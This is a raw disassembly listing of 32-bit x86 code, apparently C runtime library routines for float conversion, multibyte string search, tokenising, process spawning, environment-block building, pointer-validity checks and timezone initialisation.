mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_42C8DC
cmp ebx, edi
jz short loc_42C8D5
lea edi, [ecx+3C00h]
jmp short loc_42C8FD
; ---------------------------------------------------------------------------
loc_42C8D5: ; CODE XREF: sub_42C88E+3D�j
mov edi, 7FFFh
jmp short loc_42C8FD
; ---------------------------------------------------------------------------
loc_42C8DC: ; CODE XREF: sub_42C88E+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_42C8F4
cmp edx, ebx
jnz short loc_42C8F4
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_42C93F
; ---------------------------------------------------------------------------
loc_42C8F4: ; CODE XREF: sub_42C88E+52�j
; sub_42C88E+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_42C8FD: ; CODE XREF: sub_42C88E+45�j
; sub_42C88E+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_42C915: ; CODE XREF: sub_42C88E+A6�j
test ecx, esi
jnz short loc_42C936
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_42C915
; ---------------------------------------------------------------------------
loc_42C936: ; CODE XREF: sub_42C88E+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_42C93F: ; CODE XREF: sub_42C88E+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_42C88E endp
; ---------------------------------------------------------------------------
push 2
call sub_424FCB
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C94D proc near ; CODE XREF: sub_428E88+AC�p
; sub_428FED+10�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_63177C, esi
jnz short loc_42C96A
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4234F0
pop ecx
pop ecx
jmp short loc_42C9BC
; ---------------------------------------------------------------------------
loc_42C96A: ; CODE XREF: sub_42C94D+C�j
push edi
push 19h
call sub_428436
pop ecx
mov ecx, [ebp+arg_0]
loc_42C976: ; CODE XREF: sub_42C94D+62�j
mov dl, [ecx]
movzx eax, dl
movzx edi, al
test byte_631881[edi], 4
jz short loc_42C9A5
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_42C9A1
movzx edi, dl
shl eax, 8
or eax, edi
cmp [ebp+arg_4], eax
jnz short loc_42C9AC
lea esi, [ecx-1]
jmp short loc_42C9AC
; ---------------------------------------------------------------------------
loc_42C9A1: ; CODE XREF: sub_42C94D+40�j
test esi, esi
jmp short loc_42C9A8
; ---------------------------------------------------------------------------
loc_42C9A5: ; CODE XREF: sub_42C94D+38�j
cmp [ebp+arg_4], eax
loc_42C9A8: ; CODE XREF: sub_42C94D+56�j
jnz short loc_42C9AC
mov esi, ecx
loc_42C9AC: ; CODE XREF: sub_42C94D+4D�j
; sub_42C94D+52�j ...
inc ecx
test dl, dl
jnz short loc_42C976
push 19h
call sub_428497
pop ecx
mov eax, esi
pop edi
loc_42C9BC: ; CODE XREF: sub_42C94D+1B�j
pop esi
pop ebp
retn
sub_42C94D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C9BF proc near ; CODE XREF: sub_428E88:loc_428F04�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
loc_42C9C5: ; CODE XREF: sub_42C9BF+C�j
cmp byte ptr [ecx], 3Bh
jnz short loc_42C9CD
inc ecx
jmp short loc_42C9C5
; ---------------------------------------------------------------------------
loc_42C9CD: ; CODE XREF: sub_42C9BF+9�j
dec [ebp+arg_8]
push esi
mov eax, ecx
jz short loc_42CA22
mov dl, [ecx]
mov esi, [ebp+arg_4]
test dl, dl
jz short loc_42CA16
loc_42C9DE: ; CODE XREF: sub_42C9BF+55�j
cmp dl, 3Bh
jz short loc_42CA16
cmp dl, 22h
jz short loc_42C9F3
mov [esi], dl
inc esi
inc ecx
dec [ebp+arg_8]
jz short loc_42CA1E
jmp short loc_42CA10
; ---------------------------------------------------------------------------
loc_42C9F3: ; CODE XREF: sub_42C9BF+27�j
inc ecx
loc_42C9F4: ; CODE XREF: sub_42C9BF+49�j
mov dl, [ecx]
test dl, dl
jz short loc_42CA0A
cmp dl, 22h
jz short loc_42CA0A
mov [esi], dl
inc esi
inc ecx
dec [ebp+arg_8]
jz short loc_42CA1E
jmp short loc_42C9F4
; ---------------------------------------------------------------------------
loc_42CA0A: ; CODE XREF: sub_42C9BF+39�j
; sub_42C9BF+3E�j
cmp byte ptr [ecx], 0
jz short loc_42CA10
inc ecx
loc_42CA10: ; CODE XREF: sub_42C9BF+32�j
; sub_42C9BF+4E�j
mov dl, [ecx]
test dl, dl
jnz short loc_42C9DE
loc_42CA16: ; CODE XREF: sub_42C9BF+1D�j
; sub_42C9BF+22�j ...
cmp byte ptr [ecx], 3Bh
jnz short loc_42CA25
inc ecx
jmp short loc_42CA16
; ---------------------------------------------------------------------------
loc_42CA1E: ; CODE XREF: sub_42C9BF+30�j
; sub_42C9BF+47�j
mov eax, ecx
jmp short loc_42CA25
; ---------------------------------------------------------------------------
loc_42CA22: ; CODE XREF: sub_42C9BF+14�j
mov esi, [ebp+arg_4]
loc_42CA25: ; CODE XREF: sub_42C9BF+5A�j
; sub_42C9BF+61�j
and byte ptr [esi], 0
sub eax, ecx
neg eax
sbb eax, eax
pop esi
and eax, ecx
pop ebp
retn
sub_42C9BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CA33 proc near ; CODE XREF: sub_428E88+3A�p
; sub_428E88+114�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_63177C, 0
push ebx
push esi
jnz short loc_42CA50
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4233B0
pop ecx
pop ecx
jmp short loc_42CAC6
; ---------------------------------------------------------------------------
loc_42CA50: ; CODE XREF: sub_42CA33+C�j
push 19h
call sub_428436
mov esi, [ebp+arg_0]
pop ecx
loc_42CA5B: ; CODE XREF: sub_42CA33+60�j
movzx bx, byte ptr [esi]
test bx, bx
jz short loc_42CAAE
movzx eax, bl
test byte_631881[eax], 4
jz short loc_42CA8A
mov al, [esi+1]
inc esi
test al, al
jz short loc_42CA95
movzx ecx, bx
movzx eax, al
shl ecx, 8
or ecx, eax
cmp [ebp+arg_4], ecx
jz short loc_42CAA1
jmp short loc_42CA92
; ---------------------------------------------------------------------------
loc_42CA8A: ; CODE XREF: sub_42CA33+3B�j
movzx eax, bx
cmp [ebp+arg_4], eax
jz short loc_42CAAE
loc_42CA92: ; CODE XREF: sub_42CA33+55�j
inc esi
jmp short loc_42CA5B
; ---------------------------------------------------------------------------
loc_42CA95: ; CODE XREF: sub_42CA33+43�j
push 19h
call sub_428497
pop ecx
xor eax, eax
jmp short loc_42CAC6
; ---------------------------------------------------------------------------
loc_42CAA1: ; CODE XREF: sub_42CA33+53�j
push 19h
call sub_428497
pop ecx
lea eax, [esi-1]
jmp short loc_42CAC6
; ---------------------------------------------------------------------------
loc_42CAAE: ; CODE XREF: sub_42CA33+2F�j
; sub_42CA33+5D�j
push 19h
call sub_428497
mov eax, [ebp+arg_4]
pop ecx
movzx ecx, bx
sub eax, ecx
neg eax
sbb eax, eax
not eax
and eax, esi
loc_42CAC6: ; CODE XREF: sub_42CA33+1B�j
; sub_42CA33+6C�j ...
pop esi
pop ebx
pop ebp
retn
sub_42CA33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CACA proc near ; CODE XREF: sub_429136+32�p
var_60 = dword ptr -60h
var_2E = word ptr -2Eh
var_2C = dword ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 60h
mov eax, [ebp+arg_0]
and [ebp+var_1], 0
push ebx
push esi
push edi
xor edi, edi
cmp eax, edi
mov [ebp+var_8], edi
jz short loc_42CAF8
cmp eax, 1
jz short loc_42CAF8
jle short loc_42CB1A
cmp eax, 3
jle short loc_42CAF8
cmp eax, 4
jnz short loc_42CB1A
mov [ebp+var_1], 1
loc_42CAF8: ; CODE XREF: sub_42CACA+17�j
; sub_42CACA+1C�j ...
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
loc_42CAFE: ; CODE XREF: sub_42CACA+47�j
; sub_42CACA+4E�j
mov cl, [eax]
test cl, cl
jz short loc_42CB31
loc_42CB04: ; CODE XREF: sub_42CACA+3E�j
inc eax
cmp byte ptr [eax], 0
jnz short loc_42CB04
cmp byte ptr [eax+1], 0
lea ecx, [eax+1]
jz short loc_42CAFE
mov byte ptr [eax], 20h
mov eax, ecx
jmp short loc_42CAFE
; ---------------------------------------------------------------------------
loc_42CB1A: ; CODE XREF: sub_42CACA+1E�j
; sub_42CACA+28�j
call sub_426528
mov dword ptr [eax], 16h
call sub_426531
mov [eax], edi
jmp loc_42CC55
; ---------------------------------------------------------------------------
loc_42CB31: ; CODE XREF: sub_42CACA+38�j
push 44h
lea eax, [ebp+var_60]
pop esi
push esi
push edi
push eax
call sub_4221F0
mov [ebp+var_60], esi
mov esi, dword_631AE0
add esp, 0Ch
cmp esi, edi
jz short loc_42CB73
lea ecx, [esi-1]
loc_42CB52: ; CODE XREF: sub_42CACA+A7�j
mov edx, ecx
mov eax, ecx
sar edx, 5
and eax, 1Fh
mov edx, dword_6319E0[edx*4]
lea eax, [eax+eax*8]
cmp byte ptr [edx+eax*4+4], 0
jnz short loc_42CB73
dec esi
dec ecx
cmp esi, edi
jnz short loc_42CB52
loc_42CB73: ; CODE XREF: sub_42CACA+83�j
; sub_42CACA+A1�j
lea eax, [esi+esi*4+4]
push 1
mov [ebp+var_2E], ax
movzx eax, ax
push eax
call sub_423F63
mov [ebp+var_2C], eax
pop ecx
mov [eax], esi
mov eax, [ebp+var_2C]
pop ecx
xor ebx, ebx
cmp esi, edi
lea ecx, [eax+4]
lea edx, [eax+esi+4]
jle short loc_42CBD7
loc_42CB9D: ; CODE XREF: sub_42CACA+106�j
mov edi, ebx
mov eax, ebx
sar edi, 5
and eax, 1Fh
mov edi, dword_6319E0[edi*4]
lea eax, [eax+eax*8]
lea edi, [edi+eax*4]
mov al, [edi+4]
test al, 10h
jnz short loc_42CBC3
mov [ecx], al
mov eax, [edi]
mov [edx], eax
jmp short loc_42CBC9
; ---------------------------------------------------------------------------
loc_42CBC3: ; CODE XREF: sub_42CACA+EF�j
and byte ptr [ecx], 0
or dword ptr [edx], 0FFFFFFFFh
loc_42CBC9: ; CODE XREF: sub_42CACA+F7�j
inc ebx
inc ecx
add edx, 4
cmp ebx, esi
jl short loc_42CB9D
mov eax, [ebp+var_2C]
xor edi, edi
loc_42CBD7: ; CODE XREF: sub_42CACA+D1�j
cmp [ebp+var_1], 0
jz short loc_42CC0A
lea ecx, [eax+4]
xor edx, edx
lea eax, [eax+esi+4]
loc_42CBE6: ; CODE XREF: sub_42CACA+137�j
cmp esi, 3
jge short loc_42CBEF
mov ebx, esi
jmp short loc_42CBF2
; ---------------------------------------------------------------------------
loc_42CBEF: ; CODE XREF: sub_42CACA+11F�j
push 3
pop ebx
loc_42CBF2: ; CODE XREF: sub_42CACA+123�j
cmp edx, ebx
jge short loc_42CC03
and byte ptr [ecx], 0
or dword ptr [eax], 0FFFFFFFFh
inc edx
inc ecx
add eax, 4
jmp short loc_42CBE6
; ---------------------------------------------------------------------------
loc_42CC03: ; CODE XREF: sub_42CACA+12A�j
mov [ebp+var_8], 8
loc_42CC0A: ; CODE XREF: sub_42CACA+111�j
call sub_426528
mov [eax], edi
call sub_426531
mov [eax], edi
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_60]
push eax
push edi
push [ebp+arg_C]
push [ebp+var_8]
push 1
push edi
push edi
push [ebp+var_C]
push [ebp+arg_4]
call dword_42F078 ; CreateProcessA
mov esi, eax
call dword_42F068 ; RtlGetLastWin32Error
push [ebp+var_2C]
mov ebx, eax
call sub_4230B3
cmp esi, edi
pop ecx
jnz short loc_42CC5A
push ebx
call sub_4264B5
pop ecx
loc_42CC55: ; CODE XREF: sub_42CACA+62�j
or eax, 0FFFFFFFFh
jmp short loc_42CCAE
; ---------------------------------------------------------------------------
loc_42CC5A: ; CODE XREF: sub_42CACA+182�j
cmp [ebp+arg_0], 2
jnz short loc_42CC66
push edi
call sub_4284EA
loc_42CC66: ; CODE XREF: sub_42CACA+194�j
cmp [ebp+arg_0], edi
mov esi, dword_42F038
jnz short loc_42CC90
push 0FFFFFFFFh
push [ebp+var_1C]
call dword_42F064 ; WaitForSingleObject
lea eax, [ebp+arg_8]
push eax
push [ebp+var_1C]
call dword_42F0AC ; GetExitCodeProcess
push [ebp+var_1C]
call esi ; dword_42F038
jmp short loc_42CCA6
; ---------------------------------------------------------------------------
loc_42CC90: ; CODE XREF: sub_42CACA+1A5�j
cmp [ebp+arg_0], 4
jnz short loc_42CCA0
push [ebp+var_1C]
call esi ; dword_42F038
mov [ebp+arg_8], edi
jmp short loc_42CCA6
; ---------------------------------------------------------------------------
loc_42CCA0: ; CODE XREF: sub_42CACA+1CA�j
mov eax, [ebp+var_1C]
mov [ebp+arg_8], eax
loc_42CCA6: ; CODE XREF: sub_42CACA+1C4�j
; sub_42CACA+1D4�j
push [ebp+var_18]
call esi ; dword_42F038
mov eax, [ebp+arg_8]
loc_42CCAE: ; CODE XREF: sub_42CACA+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_42CACA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CCB3 proc near ; CODE XREF: sub_429136+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2
pop esi
mov edi, esi
loc_42CCC1: ; CODE XREF: sub_42CCB3+22�j
mov eax, [ebx]
test eax, eax
jz short loc_42CCD7
push eax
add ebx, 4
call sub_422120
pop ecx
lea edi, [edi+eax+1]
jmp short loc_42CCC1
; ---------------------------------------------------------------------------
loc_42CCD7: ; CODE XREF: sub_42CCB3+12�j
push edi
call sub_422F79
pop ecx
mov ecx, [ebp+arg_8]
test eax, eax
mov [ecx], eax
jnz short loc_42CCF2
mov eax, [ebp+arg_C]
and dword ptr [eax], 0
jmp loc_42CDD4
; ---------------------------------------------------------------------------
loc_42CCF2: ; CODE XREF: sub_42CCB3+32�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_42CD0F
loc_42CCF9: ; CODE XREF: sub_42CCB3+5A�j
mov eax, [edi]
test eax, eax
jz short loc_42CD36
push eax
add edi, 4
call sub_422120
pop ecx
lea esi, [esi+eax+1]
jmp short loc_42CCF9
; ---------------------------------------------------------------------------
loc_42CD0F: ; CODE XREF: sub_42CCB3+44�j
mov eax, [ebp+arg_C]
mov ebx, [ebp+arg_C]
mov edi, [ebp+arg_C]
and dword ptr [eax], 0
loc_42CD1B: ; CODE XREF: sub_42CCB3+10D�j
mov eax, [ebp+arg_8]
mov esi, [eax]
mov eax, [ebp+arg_0]
mov [ebp+arg_8], eax
mov eax, [eax]
test eax, eax
jnz loc_42CDF2
loc_42CD30: ; CODE XREF: sub_42CCB3+185�j
inc esi
jmp loc_42CE11
; ---------------------------------------------------------------------------
loc_42CD36: ; CODE XREF: sub_42CCB3+4A�j
mov eax, dword_6313EC
test eax, eax
jnz short loc_42CD51
call sub_42B533
test eax, eax
mov dword_6313EC, eax
jz loc_42CDEA
loc_42CD51: ; CODE XREF: sub_42CCB3+8A�j
xor ebx, ebx
cmp [eax], bl
jz short loc_42CD7A
mov edi, eax
mov cl, [edi]
loc_42CD5B: ; CODE XREF: sub_42CCB3+C5�j
cmp cl, 3Dh
jz short loc_42CD7A
push edi
call sub_422120
lea ebx, [ebx+eax+1]
mov eax, dword_6313EC
pop ecx
mov cl, [eax+ebx]
lea edi, [eax+ebx]
test cl, cl
jnz short loc_42CD5B
loc_42CD7A: ; CODE XREF: sub_42CCB3+A2�j
; sub_42CCB3+AB�j
mov edi, ebx
add eax, ebx
loc_42CD7E: ; CODE XREF: sub_42CCB3+F7�j
cmp byte ptr [eax], 3Dh
jnz short loc_42CDAC
cmp byte ptr [eax+1], 0
jz short loc_42CDAC
cmp byte ptr [eax+2], 3Ah
jnz short loc_42CDAC
cmp byte ptr [eax+3], 3Dh
jnz short loc_42CDAC
add eax, 4
push eax
call sub_422120
lea edi, [edi+eax+5]
mov eax, dword_6313EC
pop ecx
add eax, edi
jmp short loc_42CD7E
; ---------------------------------------------------------------------------
loc_42CDAC: ; CODE XREF: sub_42CCB3+CE�j
; sub_42CCB3+D4�j ...
mov eax, edi
sub eax, ebx
add eax, esi
push eax
call sub_422F79
pop ecx
mov ecx, [ebp+arg_C]
test eax, eax
mov [ecx], eax
jnz loc_42CD1B
mov esi, [ebp+arg_8]
push dword ptr [esi]
call sub_4230B3
and dword ptr [esi], 0
pop ecx
loc_42CDD4: ; CODE XREF: sub_42CCB3+3A�j
call sub_426528
mov dword ptr [eax], 0Ch
call sub_426531
mov dword ptr [eax], 8
loc_42CDEA: ; CODE XREF: sub_42CCB3+98�j
or eax, 0FFFFFFFFh
jmp loc_42CEB4
; ---------------------------------------------------------------------------
loc_42CDF2: ; CODE XREF: sub_42CCB3+77�j
push eax
push esi
call sub_423260
mov eax, [ebp+arg_0]
mov ecx, [eax]
add eax, 4
push ecx
mov [ebp+arg_8], eax
call sub_422120
add esp, 0Ch
lea esi, [esi+eax+1]
loc_42CE11: ; CODE XREF: sub_42CCB3+7E�j
mov eax, [ebp+arg_8]
mov eax, [eax]
test eax, eax
jz short loc_42CE3D
push eax
push esi
call sub_423260
mov eax, [ebp+arg_8]
add [ebp+arg_8], 4
mov eax, [eax]
push eax
call sub_422120
add esp, 0Ch
add esi, eax
mov byte ptr [esi], 20h
jmp loc_42CD30
; ---------------------------------------------------------------------------
loc_42CE3D: ; CODE XREF: sub_42CCB3+165�j
mov eax, [ebp+arg_C]
and byte ptr [esi-1], 0
and byte ptr [esi], 0
cmp [ebp+arg_4], 0
mov esi, [eax]
jz short loc_42CE8D
mov eax, edi
sub eax, ebx
push eax
mov eax, dword_6313EC
add eax, ebx
push eax
push esi
call sub_4223F0
sub edi, ebx
add esp, 0Ch
add esi, edi
mov edi, [ebp+arg_4]
loc_42CE6C: ; CODE XREF: sub_42CCB3+1D8�j
mov eax, [edi]
test eax, eax
jz short loc_42CE8D
push eax
push esi
call sub_423260
mov eax, [edi]
add edi, 4
push eax
call sub_422120
add esp, 0Ch
lea esi, [esi+eax+1]
jmp short loc_42CE6C
; ---------------------------------------------------------------------------
loc_42CE8D: ; CODE XREF: sub_42CCB3+19A�j
; sub_42CCB3+1BD�j
test esi, esi
jz short loc_42CE9F
mov eax, [ebp+arg_C]
cmp esi, [eax]
jnz short loc_42CE9C
and byte ptr [esi], 0
inc esi
loc_42CE9C: ; CODE XREF: sub_42CCB3+1E3�j
and byte ptr [esi], 0
loc_42CE9F: ; CODE XREF: sub_42CCB3+1DC�j
push dword_6313EC
call sub_4230B3
and dword_6313EC, 0
pop ecx
xor eax, eax
loc_42CEB4: ; CODE XREF: sub_42CCB3+13A�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42CCB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CEB9 proc near ; CODE XREF: sub_4291A8+5E�p
; sub_42E6EF+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_42CEC6
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42CEC6: ; CODE XREF: sub_42CEB9+7�j
push dword_631768
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push dword_631984
call sub_42E2C0
add esp, 1Ch
test eax, eax
jnz short loc_42CEF3
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42CEF3: ; CODE XREF: sub_42CEB9+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_42CEB9 endp
; =============== S U B R O U T I N E =======================================
sub_42CEF8 proc near ; CODE XREF: sub_4291A8+1E�p
; sub_42E568+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, dword_631490
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_42CF59
mov ebx, dword_42F0A4
loc_42CF11: ; CODE XREF: sub_42CEF8+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; dword_42F0A4
mov ebp, eax
cmp ebp, edi
jz short loc_42CF61
push ebp
call sub_422F79
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_42CF61
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; dword_42F0A4
test eax, eax
jz short loc_42CF61
push edi
push [esp+18h+var_4]
call sub_42E568
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_42CF11
loc_42CF59: ; CODE XREF: sub_42CEF8+11�j
xor eax, eax
loc_42CF5B: ; CODE XREF: sub_42CEF8+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42CF61: ; CODE XREF: sub_42CEF8+29�j
; sub_42CEF8+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_42CF5B
sub_42CEF8 endp
; =============== S U B R O U T I N E =======================================
sub_42CF66 proc near ; CODE XREF: sub_4292C0+77�p
; sub_4297EE+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_42F16C ; IsBadReadPtr
test eax, eax
jz short loc_42CF7E
xor esi, esi
loc_42CF7E: ; CODE XREF: sub_42CF66+14�j
mov eax, esi
pop esi
retn
sub_42CF66 endp
; =============== S U B R O U T I N E =======================================
sub_42CF82 proc near ; CODE XREF: sub_4297EE+73�p
; sub_4297EE+BF�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 1
pop esi
push [esp+4+arg_4]
push [esp+8+arg_0]
call dword_42F1B0 ; IsBadWritePtr
test eax, eax
jz short loc_42CF9A
xor esi, esi
loc_42CF9A: ; CODE XREF: sub_42CF82+14�j
mov eax, esi
pop esi
retn
sub_42CF82 endp
; =============== S U B R O U T I N E =======================================
sub_42CF9E proc near ; CODE XREF: sub_4297EE+15B�p
; sub_429B43+2D�p
arg_0 = dword ptr 4
push esi
push 1
pop esi
push [esp+4+arg_0]
call dword_42F168 ; IsBadCodePtr
test eax, eax
jz short loc_42CFB2
xor esi, esi
loc_42CFB2: ; CODE XREF: sub_42CF9E+10�j
mov eax, esi
pop esi
retn
sub_42CF9E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429A8C
loc_42CFB6: ; CODE XREF: sub_429A8C:loc_429AE8�j
push 0Ah
call sub_42B69E
push 16h
call sub_42D7FC
pop ecx
pop ecx
push 3
call sub_4284EA
; END OF FUNCTION CHUNK FOR sub_429A8C
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_42CFE4: ; CODE XREF: .text:0042CFEF�j
mov al, [edx]
or al, al
jz short loc_42CFF1
inc edx
bts [esp], eax
jmp short loc_42CFE4
; ---------------------------------------------------------------------------
loc_42CFF1: ; CODE XREF: .text:0042CFE8�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
nop
loc_42CFF8: ; CODE XREF: .text:0042D004�j
inc ecx
mov al, [esi]
or al, al
jz short loc_42D006
inc esi
bt [esp], eax
jnb short loc_42CFF8
loc_42D006: ; CODE XREF: .text:0042CFFD�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_42D024: ; CODE XREF: .text:0042D02F�j
mov al, [edx]
or al, al
jz short loc_42D031
inc edx
bts [esp], eax
jmp short loc_42D024
; ---------------------------------------------------------------------------
loc_42D031: ; CODE XREF: .text:0042D028�j
mov esi, [ebp+8]
loc_42D034: ; CODE XREF: .text:0042D03F�j
mov al, [esi]
or al, al
jz short loc_42D044
inc esi
bt [esp], eax
jnb short loc_42D034
lea eax, [esi-1]
loc_42D044: ; CODE XREF: .text:0042D038�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_42D04A proc near ; CODE XREF: sub_429DCB:loc_429E0A�p
cmp dword_631720, 0
jnz short locret_42D077
push 0Bh
call sub_428436
cmp dword_631720, 0
pop ecx
jnz short loc_42D06F
call sub_42D078
inc dword_631720
loc_42D06F: ; CODE XREF: sub_42D04A+18�j
push 0Bh
call sub_428497
pop ecx
locret_42D077: ; CODE XREF: sub_42D04A+7�j
retn
sub_42D04A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42D078 proc near ; CODE XREF: sub_42D04A+1A�p
var_18 = dword ptr -18h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
push 0Ch
pop edi
xor ebx, ebx
push edi
mov [ebp+var_8], ebx
call sub_428436
or dword_44C0B8, 0FFFFFFFFh
or dword_44C0A8, 0FFFFFFFFh
mov dword_631668, ebx
mov [esp+18h+var_18], offset aTz ; "TZ"
call sub_4291A8
mov esi, eax
pop ecx
cmp esi, ebx
jnz loc_42D1B6
push edi
call sub_428497
mov [esp+18h+var_18], offset dword_631670
call dword_42F204 ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz loc_42D2FA
mov eax, dword_631670
mov ecx, dword_6316C4
imul eax, 3Ch
cmp word_6316B6, bx
push 1
pop edx
mov dword_44C010, eax
mov dword_631668, edx
jz short loc_42D106
mov esi, ecx
imul esi, 3Ch
add eax, esi
mov dword_44C010, eax
loc_42D106: ; CODE XREF: sub_42D078+80�j
cmp word_63170A, bx
jz short loc_42D12A
mov eax, dword_631718
cmp eax, ebx
jz short loc_42D12A
sub eax, ecx
mov dword_44C014, edx
imul eax, 3Ch
mov dword_44C018, eax
jmp short loc_42D136
; ---------------------------------------------------------------------------
loc_42D12A: ; CODE XREF: sub_42D078+95�j
; sub_42D078+9E�j
mov dword_44C014, ebx
mov dword_44C018, ebx
loc_42D136: ; CODE XREF: sub_42D078+B0�j
lea eax, [ebp+var_4]
mov esi, dword_42F0A4
push eax
push ebx
push 3Fh
mov edi, 220h
push off_44C09C
push 0FFFFFFFFh
push offset dword_631674
push edi
push dword_6314D8
call esi ; dword_42F0A4
test eax, eax
jz short loc_42D172
cmp [ebp+var_4], ebx
jnz short loc_42D172
mov eax, off_44C09C
and byte ptr [eax+3Fh], 0
jmp short loc_42D17A
; ---------------------------------------------------------------------------
loc_42D172: ; CODE XREF: sub_42D078+E8�j
; sub_42D078+ED�j
mov eax, off_44C09C
and byte ptr [eax], 0
loc_42D17A: ; CODE XREF: sub_42D078+F8�j
lea eax, [ebp+var_4]
push eax
push ebx
push 3Fh
push off_44C0A0
push 0FFFFFFFFh
push offset dword_6316C8
push edi
push dword_6314D8
call esi ; dword_42F0A4
test eax, eax
jz loc_42D2E9
cmp [ebp+var_4], ebx
jnz loc_42D2E9
mov eax, off_44C0A0
and byte ptr [eax+3Fh], 0
jmp loc_42D2FA
; ---------------------------------------------------------------------------
loc_42D1B6: ; CODE XREF: sub_42D078+3B�j
cmp byte ptr [esi], 0
jz loc_42D2F3
mov eax, dword_63171C
cmp eax, ebx
jz short loc_42D1D9
push eax
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz loc_42D2F3
loc_42D1D9: ; CODE XREF: sub_42D078+14E�j
push dword_63171C
call sub_4230B3
push esi
call sub_422120
inc eax
push eax
call sub_422F79
add esp, 0Ch
cmp eax, ebx
mov dword_63171C, eax
jz loc_42D2F3
push esi
push eax
call sub_423260
push edi
call sub_428497
push 3
push esi
push off_44C09C
call sub_4222F0
mov eax, off_44C09C
add esi, 3
add esp, 18h
and byte ptr [eax+3], 0
cmp byte ptr [esi], 2Dh
jnz short loc_42D238
mov [ebp+var_8], 1
inc esi
loc_42D238: ; CODE XREF: sub_42D078+1B6�j
push esi
call sub_422ACF
pop ecx
mov bl, 30h
mov ecx, eax
imul ecx, 0E10h
mov dword_44C010, ecx
